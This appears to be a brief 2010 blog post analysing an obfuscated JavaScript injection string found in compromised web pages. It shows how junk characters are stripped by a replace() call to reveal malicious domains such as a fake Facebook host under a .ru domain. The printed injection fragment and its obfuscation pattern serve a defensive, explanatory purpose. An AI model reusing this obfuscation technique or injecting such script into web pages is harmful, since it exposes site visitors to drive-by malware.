Thursday, January 28, 2010

stuffed malware domains

delete all the !@#$%^&*+|')( stuffing from the injection strings to find the domain

'a^(c#@$&e))b&&o!^&o^)$#k(!&-#c@o&)m$##.$!@t))o^((p!&@!l(i!((n($e#$m^#)a((@r$@!(i#n^@@$e(#((.#&r@$@)u^$):^(D@^E(&&B^U)G&&$/#)(i((@p!@$i&#c$@(t(!u!&r$e&)((.!$^$$r@u&/@(i@#p$)i(!c!^$!^t(^$$u#!(r()@e##.)#r(^@$u)(^$@/(@g$!$^)o&$#o)!(g$!l)&&e$$.&$c@@#)o@#$m^^@/)@&c&(^)n(!z$z!&@.$$c)!@o!^m!#/)#s)($k$&y^&c#&$n).#c!@(o@@$m@#$$^/@'.replace(/\!|&|#|@|\^|\)|\(|\$/ig, '') ;document.write('');} } catch(Dj8lyxdn ) {}

becomes;
'acebook-com.toplinemarine.ru:DEBUG/ipicture.ru/ipicture.ru/google.com/cnzz.com/skycn.com/.replace//ig;document.write'catchDj8lyxd
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)